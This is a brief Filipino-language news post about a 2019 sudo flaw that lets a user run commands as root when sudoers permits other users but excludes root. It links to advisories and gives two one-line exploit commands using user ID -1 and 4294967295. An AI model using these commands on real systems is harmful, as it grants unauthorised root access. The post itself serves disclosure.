Kahinaan sa sudo

Ang isang bug sa sudo ay nagbibigay-daan sa iyo na magsagawa ng anumang maipapatupad na file bilang root kung /etc/sudoers ay nagpapahintulot na ito ay maisakatuparan ng ibang mga user at ipinagbabawal para sa root.

Ang pagsasamantala ng error ay napaka-simple:

sudo -u#-1 id -u

o:

sudo -u#4294967295 id -u

Ang error ay naroroon sa lahat ng mga bersyon ng sudo bago ang 1.8.28

Mga Detalye:

https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html


https://www.sudo.ws/alerts/minus_1_uid.html

Pinagmulan: linux.org.ru

Magdagdag ng komento